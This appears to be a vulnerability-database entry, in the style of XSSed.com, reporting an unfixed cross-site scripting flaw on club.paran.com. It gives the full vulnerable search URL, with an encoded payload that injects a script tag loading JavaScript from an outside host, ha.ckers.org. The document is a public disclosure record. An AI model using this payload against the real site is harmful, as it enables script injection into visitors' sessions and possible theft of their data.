Unfixed XSS vulnerability at club.paran.com

ID: XSSED:64723
Type: xssed
Reporter: 1kt0m1
Modified: 2011-12-16T00:00:00


Security researcher 1kt0m1 submitted a cross-site scripting (XSS) vulnerability affecting club.paran.com on 07/10/2009. At the time of submission, the site ranked 4112 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://club.paran.com/main/clubsearch_new.do?p_eye=club^hom^top^clu^searchbtn&query=%3C%3CSCRIPT+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2F%3C%3C%2FSCRIPT%3E&searchField=bbs&sort=&order=&page=